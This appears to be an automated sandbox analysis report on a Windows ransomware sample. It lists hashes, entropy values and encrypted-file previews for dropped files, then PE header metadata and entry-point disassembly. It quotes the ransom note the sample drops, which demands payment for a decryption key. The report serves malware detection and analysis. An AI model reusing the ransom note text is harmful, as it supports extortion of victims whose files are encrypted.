                                                                                              MD5:821BD196FE78875BC9692D9BF6B8E6E6
                                                                                              SHA1:628AFEBF3B5E65199EFCA4F7633E24F9F2F1337B
                                                                                              SHA-256:A609B926F8D9559DFF1A0094EB95A9B057C940F774DF0AA450E75F15DA3A7C3C
                                                                                              SHA-512:E51C3072072F86564A46ED5C0361D16756659A472BB6C811063BD56D513FF3A46DFD816F7711B8BEF205CC12CFA7679E7570D9B840E28FCB97DA9FDD70B7E86E
                                                                                              Malicious:false
                                                                                              Preview:[{000X..>..wO..}..w.m.........A-W...:.M...O.W.....4q.w...8....]=...q[.|Y...._.V....)..Ym..J.S..z...6X..\...m6....$..i.=.......2V......:.....0....2....*.pg"...*.o.a..$...M.l.RPq?..F....,..Zd....>........]/.K..OQ.V.....b..u..CZW..,..2...>..b......u...../|..R8&B".N.N...1.d..&..Xk.nN..i.....b.*t.1.tfY..\b2r.Vw..E1B+I..n......w..l"....W...E...@.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):443
                                                                                              Entropy (8bit):7.425877945340836
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:CNK6/CIyw94FbNVYIhEqy/UOJ3ry1+cii9a:w3aS4fVgqy/5bD
                                                                                              MD5:821BD196FE78875BC9692D9BF6B8E6E6
                                                                                              SHA1:628AFEBF3B5E65199EFCA4F7633E24F9F2F1337B
                                                                                              SHA-256:A609B926F8D9559DFF1A0094EB95A9B057C940F774DF0AA450E75F15DA3A7C3C
                                                                                              SHA-512:E51C3072072F86564A46ED5C0361D16756659A472BB6C811063BD56D513FF3A46DFD816F7711B8BEF205CC12CFA7679E7570D9B840E28FCB97DA9FDD70B7E86E
                                                                                              Malicious:false
                                                                                              Preview:[{000X..>..wO..}..w.m.........A-W...:.M...O.W.....4q.w...8....]=...q[.|Y...._.V....)..Ym..J.S..z...6X..\...m6....$..i.=.......2V......:.....0....2....*.pg"...*.o.a..$...M.l.RPq?..F....,..Zd....>........]/.K..OQ.V.....b..u..CZW..,..2...>..b......u...../|..R8&B".N.N...1.d..&..Xk.nN..i.....b.*t.1.tfY..\b2r.Vw..E1B+I..n......w..l"....W...E...@.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):446
                                                                                              Entropy (8bit):7.49501534403219
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:ZlAR+EFQBYtkbqypTbn+jYI1VxbTZ7Td3k5eAVH1+cii9a:ZlAtFQKInuz/B7Td3k5epbD
                                                                                              MD5:CFBF5289A187D923F7200634D497C654
                                                                                              SHA1:18EFDF17707186A8DEF4F943C46FCA57394F9572
                                                                                              SHA-256:CE89AA5994B07F7AC6F307ABB98CA912BD98D07932B383F7C2C9E724382815F9
                                                                                              SHA-512:754C13E832BC3F5134542F0A8847B92ABA305DD14C832776E6FDC5D36C02C6D3C3CC6097203D528EB27D4AE550F0A7BDCC1B2C3980C6260A67EB8AC96850DD43
                                                                                              Malicious:false
                                                                                              Preview:[{000P.e..Q.b.z.3.y~......<j......:...(:Kcv..5.F..K<g.;..it...A..T.......l..6n....a..QJT.La8..t..].4..w.W..cX..=(...$.+C6...._...i..Y.1.o.U...<O.W.,mLDk..u@.y..".ClS.n.....-.^^;.s..g.#.NS...I...xJ`.uS..=`?%$....0"..p.=..h.R,u....}_.z.."d......F.....$......O...2..u.2..8.....+.d..9uF...m..)..!OC.6.I..$.....p.'.....'>l....bg..E..@~..}$(G1/.....b5.w..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):446
                                                                                              Entropy (8bit):7.49501534403219
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:ZlAR+EFQBYtkbqypTbn+jYI1VxbTZ7Td3k5eAVH1+cii9a:ZlAtFQKInuz/B7Td3k5epbD
                                                                                              MD5:CFBF5289A187D923F7200634D497C654
                                                                                              SHA1:18EFDF17707186A8DEF4F943C46FCA57394F9572
                                                                                              SHA-256:CE89AA5994B07F7AC6F307ABB98CA912BD98D07932B383F7C2C9E724382815F9
                                                                                              SHA-512:754C13E832BC3F5134542F0A8847B92ABA305DD14C832776E6FDC5D36C02C6D3C3CC6097203D528EB27D4AE550F0A7BDCC1B2C3980C6260A67EB8AC96850DD43
                                                                                              Malicious:false
                                                                                              Preview:[{000P.e..Q.b.z.3.y~......<j......:...(:Kcv..5.F..K<g.;..it...A..T.......l..6n....a..QJT.La8..t..].4..w.W..cX..=(...$.+C6...._...i..Y.1.o.U...<O.W.,mLDk..u@.y..".ClS.n.....-.^^;.s..g.#.NS...I...xJ`.uS..=`?%$....0"..p.=..h.R,u....}_.z.."d......F.....$......O...2..u.2..8.....+.d..9uF...m..)..!OC.6.I..$.....p.'.....'>l....bg..E..@~..}$(G1/.....b5.w..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):445
                                                                                              Entropy (8bit):7.483021969916906
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:MMT84ErM4nIfqeBm9sNC6cu2BhES1+cii9a:Mz7nIEsVc1hAbD
                                                                                              MD5:A152F5DFEE1CB427852759FADF5AC92C
                                                                                              SHA1:84299AE4072F2FD14293F3747C304BB763BCCD8E
                                                                                              SHA-256:87C4397C78656E98A2F9C7AFA728C630810648CC7A42813B5398BFF6C036F335
                                                                                              SHA-512:9EB0D803DD94F70B05AAC36A87CBAAE0F11ED5FB5D3CB79A136F2C316B1D6ACE5F4CD1D998B1DF2B4426388C1009ED7E300350FF9712A58013B2667F4E23B1E7
                                                                                              Malicious:false
                                                                                              Preview:[{000.....0...n...).>....bDR...E]5y......Y......].l!.].T.......R.0D.P.H.........o|.....$...{HZ|<.q^...[.5{.s.t(...$K\`6..&$..8Zz,.mz.xo.A.NE...kI.4.U...g.8...yR...M.8..Vw...D..6.Z..3g.).3u..6o<ci....*.....O....]+.h..Z...f/..6k ...n...Js..`.Y<.6...(.v%.....u..2..b......i.....GB.T.........I[.O.....&......k........_..@i..{.k.S.T.P...0QL;A..N... ..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):445
                                                                                              Entropy (8bit):7.483021969916906
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:MMT84ErM4nIfqeBm9sNC6cu2BhES1+cii9a:Mz7nIEsVc1hAbD
                                                                                              MD5:A152F5DFEE1CB427852759FADF5AC92C
                                                                                              SHA1:84299AE4072F2FD14293F3747C304BB763BCCD8E
                                                                                              SHA-256:87C4397C78656E98A2F9C7AFA728C630810648CC7A42813B5398BFF6C036F335
                                                                                              SHA-512:9EB0D803DD94F70B05AAC36A87CBAAE0F11ED5FB5D3CB79A136F2C316B1D6ACE5F4CD1D998B1DF2B4426388C1009ED7E300350FF9712A58013B2667F4E23B1E7
                                                                                              Malicious:false
                                                                                              Preview:[{000.....0...n...).>....bDR...E]5y......Y......].l!.].T.......R.0D.P.H.........o|.....$...{HZ|<.q^...[.5{.s.t(...$K\`6..&$..8Zz,.mz.xo.A.NE...kI.4.U...g.8...yR...M.8..Vw...D..6.Z..3g.).3u..6o<ci....*.....O....]+.h..Z...f/..6k ...n...Js..`.Y<.6...(.v%.....u..2..b......i.....GB.T.........I[.O.....&......k........_..@i..{.k.S.T.P...0QL;A..N... ..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):446
                                                                                              Entropy (8bit):7.440813775890354
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:HnP9mfbtDgmYplvwL3rM+1I8yfF63nM1+cii9a:HVCGpSfMKI8ywnHbD
                                                                                              MD5:D058EDFFBFAB5CC5D9CB3D48D5EE0EEB
                                                                                              SHA1:5B1A9F4E838B842915C2DF202DBAE121A801BEC2
                                                                                              SHA-256:578535A2EFFC3B08A51D81A1109251A257CCD88EC39C79B79812A4933A6DD27A
                                                                                              SHA-512:048F14594D266BB08F19ADADFC98B649E490E2DE388DF3B70730959F3FA06BF3AA1D358449E10FA5CF5130D28D6746198D7126D1B3DD386AE1C3F1C6BB7475FE
                                                                                              Malicious:false
                                                                                              Preview:[{000.k..:.3XL...n...o/...G...`...Mrp..g\....cn(.".....k.fpJa.d#X..n...F.%.a-u....o.Z...~.z......P. ]i.o.......}5/...d.l....mL....*.$...r...[.x. ...j...p.Dy..m.1.........a%...+.-..%.X.....;x..'.iI.."3..%Q..0..p.Z.c.E.B[...n.3...|....,W.v../...6@Gf..+|.HJ..T.o...<?..._...E..t..z.Z[....6....0F.q.@......L..1...ZM./~..@...*.W..=....4H6V..s:...k..f`.0.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):446
                                                                                              Entropy (8bit):7.440813775890354
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:HnP9mfbtDgmYplvwL3rM+1I8yfF63nM1+cii9a:HVCGpSfMKI8ywnHbD
                                                                                              MD5:D058EDFFBFAB5CC5D9CB3D48D5EE0EEB
                                                                                              SHA1:5B1A9F4E838B842915C2DF202DBAE121A801BEC2
                                                                                              SHA-256:578535A2EFFC3B08A51D81A1109251A257CCD88EC39C79B79812A4933A6DD27A
                                                                                              SHA-512:048F14594D266BB08F19ADADFC98B649E490E2DE388DF3B70730959F3FA06BF3AA1D358449E10FA5CF5130D28D6746198D7126D1B3DD386AE1C3F1C6BB7475FE
                                                                                              Malicious:false
                                                                                              Preview:[{000.k..:.3XL...n...o/...G...`...Mrp..g\....cn(.".....k.fpJa.d#X..n...F.%.a-u....o.Z...~.z......P. ]i.o.......}5/...d.l....mL....*.$...r...[.x. ...j...p.Dy..m.1.........a%...+.-..%.X.....;x..'.iI.."3..%Q..0..p.Z.c.E.B[...n.3...|....,W.v../...6@Gf..+|.HJ..T.o...<?..._...E..t..z.Z[....6....0F.q.@......L..1...ZM./~..@...*.W..=....4H6V..s:...k..f`.0.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):448
                                                                                              Entropy (8bit):7.334432622314308
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:B77dr7UJeo2CFCbD9Orq/CYPMWBX1+cii9a:B7J0ZCbD9T/CYFBkbD
                                                                                              MD5:66B6E53A21A0CEA1DA81C72D5ECFF779
                                                                                              SHA1:8CA9418FCA83285F07E546550EB3DCD3C3CA32CA
                                                                                              SHA-256:5B11EA3CD35E41510C3EDE95B63E53FEF048ECBC551A3B5A1B3FB760F17762DF
                                                                                              SHA-512:7088DE92F34685C9E62FEC35CD448F52A944D82C3A9E548C01779F1B1823E063C761229A5858A755FDF45D11DBDEC2A5799ABFB75DB4D7FFC7F75461148656A2
                                                                                              Malicious:false
                                                                                              Preview:[{000..P....o?...[..@,X......q.W.tTR....{..qq...e...x5O..b....u.T....r...-+..Xv...kX.HC........K..T5D..-.t..dCi)..6.\.\I.........6.@ny..T.wv...W....3.gdj@.R;.K..u$y.)E.|..%............|c...7 .A...DD>3l..^.F..0y0iEd.Y.f.(r=...qe#...O...}&U.k...<..&.....R....o....Z..)...Y.. .0...l.I....W.H.K.h.....wE..6S<=.X...,.!....T.+..h.55.}!.-#=..)....[X.>M){.#..@M\w..\.c.`.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):448
                                                                                              Entropy (8bit):7.334432622314308
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:B77dr7UJeo2CFCbD9Orq/CYPMWBX1+cii9a:B7J0ZCbD9T/CYFBkbD
                                                                                              MD5:66B6E53A21A0CEA1DA81C72D5ECFF779
                                                                                              SHA1:8CA9418FCA83285F07E546550EB3DCD3C3CA32CA
                                                                                              SHA-256:5B11EA3CD35E41510C3EDE95B63E53FEF048ECBC551A3B5A1B3FB760F17762DF
                                                                                              SHA-512:7088DE92F34685C9E62FEC35CD448F52A944D82C3A9E548C01779F1B1823E063C761229A5858A755FDF45D11DBDEC2A5799ABFB75DB4D7FFC7F75461148656A2
                                                                                              Malicious:false
                                                                                              Preview:[{000..P....o?...[..@,X......q.W.tTR....{..qq...e...x5O..b....u.T....r...-+..Xv...kX.HC........K..T5D..-.t..dCi)..6.\.\I.........6.@ny..T.wv...W....3.gdj@.R;.K..u$y.)E.|..%............|c...7 .A...DD>3l..^.F..0y0iEd.Y.f.(r=...qe#...O...}&U.k...<..&.....R....o....Z..)...Y.. .0...l.I....W.H.K.h.....wE..6S<=.X...,.!....T.+..h.55.}!.-#=..)....[X.>M){.#..@M\w..\.c.`.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):446
                                                                                              Entropy (8bit):7.459646650061745
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:pgY2oAbH6Ddw7IC0Ihx9eDBIxQg7iMdrNMo1+cii9a:yroAba/ZIABaQKybD
                                                                                              MD5:CFC0086E0A0942AF1496A973FEBA5F01
                                                                                              SHA1:EF743FFAC304369CDF91FDAC32CA6FDED610C203
                                                                                              SHA-256:A46978CD64F57E07ACDB6BE39E32DB4ED74808D2B64681B4951F05412ACEED01
                                                                                              SHA-512:5BFA7F7191BBEC03E33D06CC7CEAF03C85787667C2D35E02EEDE156F5011F1CC7A6BC6DCCC9A11EFFC9FA37270C3D2D60152AC9C20410D54930482922F80F246
                                                                                              Malicious:false
                                                                                              Preview:[{000.]...s...t..s-R.4.6..W....A.aLBU..,M.K.;p.....#]......".>.....vG..4.....M..k...wo.U.`.0..&V...(.$pH*.ru`;...C...K.Xt......{.Z..w.....s. .Hr....x.MeGKh......./..e....3Dp&..|.I.N.".,}.`...b.......`...y.%L...,..VXr........7.....4.Q....|q4.+..xs......V.YOW..l...M..so........m.R._...H....U.27..~.u......Pt......:...`...:.....Q[-.B&N...hs.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):446
                                                                                              Entropy (8bit):7.459646650061745
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:pgY2oAbH6Ddw7IC0Ihx9eDBIxQg7iMdrNMo1+cii9a:yroAba/ZIABaQKybD
                                                                                              MD5:CFC0086E0A0942AF1496A973FEBA5F01
                                                                                              SHA1:EF743FFAC304369CDF91FDAC32CA6FDED610C203
                                                                                              SHA-256:A46978CD64F57E07ACDB6BE39E32DB4ED74808D2B64681B4951F05412ACEED01
                                                                                              SHA-512:5BFA7F7191BBEC03E33D06CC7CEAF03C85787667C2D35E02EEDE156F5011F1CC7A6BC6DCCC9A11EFFC9FA37270C3D2D60152AC9C20410D54930482922F80F246
                                                                                              Malicious:false
                                                                                              Preview:[{000.]...s...t..s-R.4.6..W....A.aLBU..,M.K.;p.....#]......".>.....vG..4.....M..k...wo.U.`.0..&V...(.$pH*.ru`;...C...K.Xt......{.Z..w.....s. .Hr....x.MeGKh......./..e....3Dp&..|.I.N.".,}.`...b.......`...y.%L...,..VXr........7.....4.Q....|q4.+..xs......V.YOW..l...M..so........m.R._...H....U.27..~.u......Pt......:...`...:.....Q[-.B&N...hs.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1193
                                                                                              Entropy (8bit):7.807329751850404
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:x3PUztTiPjPJZ3phazdlNigoR/MP10KcEXu5fIUlchlg2zq4ohHbD:xfotCphQdzbcfqG2zMh7D
                                                                                              MD5:7E781B8852DC79816397844B5CAA8BB5
                                                                                              SHA1:FE82F5FCBD3FABEA6D3BE8DB2C78413538A5AB2C
                                                                                              SHA-256:ECC68838FC9D084DECCD23D4697573A38ACEC7EA1C0C743CC710554A76E247BE
                                                                                              SHA-512:A2EE96CC0DF47D7FCC79181B5F04DE8AA6C10217BA85187925C9ECA2B0754D1C404EE474059371921C037CD6D49B64BA4902C818382CE2EA56B785BCAE5E442D
                                                                                              Malicious:false
                                                                                              Preview:<?xml.*.['..k.J.3...C.Y.x2....{..2..b(8.....b...w..l.v*F...wt[.?.%E..8XB...E.&.../....~r......h..>.#.K.......T....-..A.....0..jN.....N..&....=...........6H..h...fp..A...;$b.Y..p.3.3.....C.......<....va..o...i........e.4.^...U..3i..Y.hl..*..^.[>G..O.....[..KJ.g......bl.D... ...9:.B.y....J.....Sn....J..%*.&.....h..2.....4G....\..........l..9+..0}./...y......q=0..Lo...2:.^.yR}...Y....,..-..#)a`.2G.....\9...M..Q|...F.....il..&.|...G.O..V..9Zj.......P...P..hAL%g.}.f"....J........W\D..b.u._..RQ...6.H....Aa.RC..9..Y..3M.5......oA..W.<7..'......h.kYnt.....8f......<,...!....7....j.x..u.......{Z..3...Y...v..|..../^......a....H>..3.x.N.......P..{H(.%^.z.q.L.......<.E..q...!.J.f.r...:u.u..z1....Ya...H......_.O..<.e.....]O...Y....wj...>.D..._...5.(.^.....kp....9...<.._......:..c....P.y..A..x..n......H@.........x.~.IO.P].D..n..g...Zww.b."...q2.....=...8.....M.P4.......t.&..Fa%.0\.?.O...q..Z.";E.g*8v....h..P\.e.......z.F4.....vJ!\.S.....d-#U..nk.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1193
                                                                                              Entropy (8bit):7.807329751850404
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:x3PUztTiPjPJZ3phazdlNigoR/MP10KcEXu5fIUlchlg2zq4ohHbD:xfotCphQdzbcfqG2zMh7D
                                                                                              MD5:7E781B8852DC79816397844B5CAA8BB5
                                                                                              SHA1:FE82F5FCBD3FABEA6D3BE8DB2C78413538A5AB2C
                                                                                              SHA-256:ECC68838FC9D084DECCD23D4697573A38ACEC7EA1C0C743CC710554A76E247BE
                                                                                              SHA-512:A2EE96CC0DF47D7FCC79181B5F04DE8AA6C10217BA85187925C9ECA2B0754D1C404EE474059371921C037CD6D49B64BA4902C818382CE2EA56B785BCAE5E442D
                                                                                              Malicious:false
                                                                                              Preview:<?xml.*.['..k.J.3...C.Y.x2....{..2..b(8.....b...w..l.v*F...wt[.?.%E..8XB...E.&.../....~r......h..>.#.K.......T....-..A.....0..jN.....N..&....=...........6H..h...fp..A...;$b.Y..p.3.3.....C.......<....va..o...i........e.4.^...U..3i..Y.hl..*..^.[>G..O.....[..KJ.g......bl.D... ...9:.B.y....J.....Sn....J..%*.&.....h..2.....4G....\..........l..9+..0}./...y......q=0..Lo...2:.^.yR}...Y....,..-..#)a`.2G.....\9...M..Q|...F.....il..&.|...G.O..V..9Zj.......P...P..hAL%g.}.f"....J........W\D..b.u._..RQ...6.H....Aa.RC..9..Y..3M.5......oA..W.<7..'......h.kYnt.....8f......<,...!....7....j.x..u.......{Z..3...Y...v..|..../^......a....H>..3.x.N.......P..{H(.%^.z.q.L.......<.E..q...!.J.f.r...:u.u..z1....Ya...H......_.O..<.e.....]O...Y....wj...>.D..._...5.(.^.....kp....9...<.._......:..c....P.y..A..x..n......H@.........x.~.IO.P].D..n..g...Zww.b."...q2.....=...8.....M.P4.......t.&..Fa%.0\.?.O...q..Z.";E.g*8v....h..P\.e.......z.F4.....vJ!\.S.....d-#U..nk.
                                                                                              Process:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1381
                                                                                              Entropy (8bit):4.893644520875933
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
                                                                                              MD5:B65D7C11FCF0D75B3E599B80543A852D
                                                                                              SHA1:D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
                                                                                              SHA-256:D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
                                                                                              SHA-512:EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
                                                                                              Malicious:true
                                                                                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1381
                                                                                              Entropy (8bit):4.893644520875933
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
                                                                                              MD5:B65D7C11FCF0D75B3E599B80543A852D
                                                                                              SHA1:D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
                                                                                              SHA-256:D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
                                                                                              SHA-512:EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
                                                                                              Malicious:true
                                                                                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.761135023384828
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:file.exe
                                                                                              File size:240'128 bytes
                                                                                              MD5:a25ac46e5bea920465d1838177782e5b
                                                                                              SHA1:7abf711cac6ff5f35fc0b3f435d6ec5d9b0a0298
                                                                                              SHA256:4f367a58544f96f8d0dd19d323acf0db1437d2cd8ef96324a37ea7be20cabf36
                                                                                              SHA512:a469acbfc356df68532eaf869ee0e56c7ad8323faf4a5c63d01bacb6514232eb0f4defb389cc893e8fe4b31fe1b672d7e5c026711b7590030ae87b433e6f93a4
                                                                                              SSDEEP:3072:IMyOsyYDXRL9QTYtSH+E5l675WmXVxS0VRqmVq+h56cphuoqL54ee6UWGG80yWJx:KpLRLa0t0q60Nqmhuoq2eehRGZpJT
                                                                                              TLSH:DC34CF5173D1D4B5F56342315830DAE41A3EFCBA8EA48A57F3583B1F2C71281AB62B72
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*...Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5....Ko......Ko.5....Ko.Rich.Ko.........................PE..L......d...
                                                                                              Icon Hash:7149494555444043
                                                                                              Entrypoint:0x4043c7
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x640085BC [Thu Mar 2 11:17:16 2023 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:1
                                                                                              File Version Major:5
                                                                                              File Version Minor:1
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:1
                                                                                              Import Hash:8744ff8cb8213e20c3a4b3f29831f2ef
                                                                                              Instruction
                                                                                              call 00007F3D1C8320A7h
                                                                                              jmp 00007F3D1C82D4A4h
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              mov eax, dword ptr [ebp+08h]
                                                                                              push esi
                                                                                              mov esi, ecx
                                                                                              and dword ptr [esi+04h], 00000000h
                                                                                              mov dword ptr [esi], 00411270h
                                                                                              mov byte ptr [esi+08h], 00000000h
                                                                                              push dword ptr [eax]
                                                                                              call 00007F3D1C82D6CDh
                                                                                              mov eax, esi
                                                                                              pop esi
                                                                                              pop ebp
                                                                                              retn 0004h
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              mov eax, dword ptr [ebp+08h]
                                                                                              mov dword ptr [ecx], 00411270h
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov dword ptr [ecx+04h], eax
                                                                                              mov eax, ecx
                                                                                              mov byte ptr [ecx+08h], 00000000h
                                                                                              pop ebp
                                                                                              retn 0008h
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push esi
                                                                                              push dword ptr [ebp+08h]
                                                                                              mov esi, ecx
                                                                                              and dword ptr [esi+04h], 00000000h
                                                                                              mov dword ptr [esi], 00411270h
                                                                                              mov byte ptr [esi+08h], 00000000h
                                                                                              call 00007F3D1C82D637h
                                                                                              mov eax, esi
                                                                                              pop esi
                                                                                              pop ebp
                                                                                              retn 0004h
                                                                                              mov dword ptr [ecx], 00411270h
                                                                                              jmp 00007F3D1C82D6BBh
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push esi
                                                                                              push edi
                                                                                              mov edi, dword ptr [ebp+08h]
                                                                                              mov esi, ecx
                                                                                              cmp esi, edi
                                                                                              je 00007F3D1C82D63Fh
                                                                                              call 00007F3D1C82D6A8h
                                                                                              cmp byte ptr [edi+08h], 00000000h
                                                                                              je 00007F3D1C82D62Eh
                                                                                              push dword ptr [edi+04h]
                                                                                              mov ecx, esi
                                                                                              call 00007F3D1C82D65Ah
                                                                                              jmp 00007F3D1C82D628h
                                                                                              mov eax, dword ptr [edi+04h]
                                                                                              mov dword ptr [esi+04h], eax
                                                                                              pop edi
                                                                                              mov eax, esi
                                                                                              pop esi
                                                                                              pop ebp
                                                                                              retn 0004h
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push esi
                                                                                              mov esi, ecx
                                                                                              mov dword ptr [esi], 00411270h
                                                                                              call 00007F3D1C82D677h
                                                                                              test byte ptr [ebp+08h], 00000001h
                                                                                              je 00007F3D1C82D629h
                                                                                              push esi
                                                                                              call 00007F3D1C82B8CDh
                                                                                              Programming Language:
                                                                                              • [ASM] VS2013 build 21005
